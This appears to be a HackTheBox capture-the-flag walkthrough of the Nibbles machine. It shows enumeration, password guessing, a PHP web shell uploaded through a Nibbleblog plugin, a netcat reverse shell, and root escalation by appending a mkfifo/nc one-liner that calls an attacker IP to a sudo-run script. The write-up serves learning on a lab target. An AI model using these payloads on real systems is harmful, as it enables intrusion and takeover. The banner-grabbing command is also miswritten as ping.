Welcome! It is time to look at the Nibbles machine on HackTheBox. Nibbles is a fairly simple machine, however with the inclusion of a login blacklist, it is a fair bit more challenging to find valid credentials. Luckily, a username can be enumerated and guessing the correct password does not take long for most.
I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by playing HTB machines.
Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.
Machine URL: https://app.hackthebox.com/machines/Nibbles
Enumeration
Let’s get started. As a start it is always a good idea to do a simple ICMP ping to see that the machine is running and that we have a connection:
ping 10.10.10.75
We get a response back, so everything is great.
Now let’s continue by running nmap.
nmap -sV -sC — open -oA nibbles_nmap 10.10.10.75
The -sV flag provides version detection, while the –sC flag runs some basic scripts. The -oA flag saves the output in different formats.
We see two open ports, one running a SSH service (used for remote access to the machine) and the other port is running a http server.
We can do some banner grabbing on the ports with netcat to confirm this:
ping 10.10.10.75 <port number>
Web Footprinting
Let’s visit the page:
Nothing interesting here. What about the source code?
A nibbleblog directory. Interesting! This shows us a simple CMS system:
If we use the Wappalyzer plugin for your favorite browser we can see that the site is running on PHP:
Similar information can be gained by running the whatweb binary in the terminal:
whatweb 10.10.10.75/nibbleblog
Directory enumeration
It is time to use gobuster to find other useful pages and directories:
gobuster dir -u http://10.10.10.75/nibbleblog/ --wordlist /usr/share/dirb/wordlists/common.txt
Lots of interesting finds here!
We found both a admin.php page, and some interesting folder such as content, language, plugins and themes! And directory listing is enabled, since we can see the different files and folders directly in the browser:
We can also found more interesting stuff at /content/private/:
This directory includes a config file:
There is also a user file, which confirms there is a admin user.
There is also a readme file which tells us that the Nibbleblog is running on version v4.0.3.
Now let’s take a look at that admin page:
We can try and use some standard username/password combination such as admin/admin, or admin/admin. These unfortunately do not work, so we need to be a bit more creative.
The site title is called nibbles, and we see this in the config file a bit as well. Could this the password, combined with the admin username we found before?
Bingo!
Initial Foothold
Now we need to have a look around to see if we can find some vulnerabilities.
And after some browsing around we come across a plugin with the name “My image”.
We can press configure, and this allows us to upload a file. If this file upload function allows us to upload PHP files, it could allow us to upload a reverse shell!
We can test this by creating a simple PHP which echos the working directory.
<?php system('pwd'); ?>
We can then try to upload it:
If we afterwards look into the /content/private/plugins/my_image/ directory, we can see the file there (although renamed as image.php):
If we click the file, the payload should run:
It does, so this CMS is definitely vulnerable. Let’s find a real reverse shell payload. We can find a common one here:
Copy the script contents in a new file (or reuse the previous one):
Remember to update the ip (to the attacker ip) and port so it suits your needs.
Now, start up a simple netcat listener on the same port added to the script. This can then receive the reverse shell.
nc -lvnp 1234
Now, upload the file and run it by visiting it in the browser:
http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
This should give you a reverse shell:
While this is great, this does not give us a particularly nice shell to work with. We need to make it smarter by making it fully interactive. We call this upgrading to a fully interactive TTY. We can do this with a simple Python call and should look like this:
python3 -c 'import pty; pty.spawn("/bin/bash")'
This gives us a more regularly looking shell:
Optional:
If you want a even more stable shell you can use the following commands:
python -c 'import pty; pty.spawn("/bin/bash")'
# background the shell: CTRL + Z
stty raw -echo
fg
export TERM=xterm
Now we can access the user.txt flag in the nibbler home directory:
Privilege Escalation
This is great, but we will want more privileges.
In the home directory where we found the flag there was also a zip file. We can unzip this by running:
unzip personal.zip
It contains an interesting shell script.
If we list our privileges we can read that we can run this shell script with root privileges:
We could also have figured this out (and more!) by running a script such as LinEnum or LinPEAS!
Now that we know that the file gets run with root privileges, we can add a reverse shell script to the end of it so that we gain a reverse shell with root privileges. We need to add it to the end so that the rest of the script runs as normal and does not get disrupted.
We can use the following command to add a one-liner to the monitor.sh shell script:
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 8443 >/tmp/f' | tee -a monitor.sh
Remember to edit the ip address, and take note of the port number (8443). Now all that is needed is running another netcat listener:
nc -lvnp 8443
And run the script!
sudo /home/nibbler/personal/stuff/monitor.sh
We got root access!
Now, simply read the root.txt flag in the /root directory:
That’s it! We are done!
I should possibly mention that all of this could be done in a few seconds by using the Metasploit module called exploit/multi/http/nibbleblog_file_upload
The steps would be like this:
- Searching for the module
- Activating it by running use 0.
- Setting the options (ip, ports, admin username and password)
- Setting the target:
- Running the module by entering run.
- Gaining access!
Try it for yourself as practice. Both strategies are worth trying as it will help you to become smarter 🙂
Like my articles?
You are welcome to give my article a clap or two 🙂
I would be so grateful if you support me by buying me a cup of coffee:
I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link: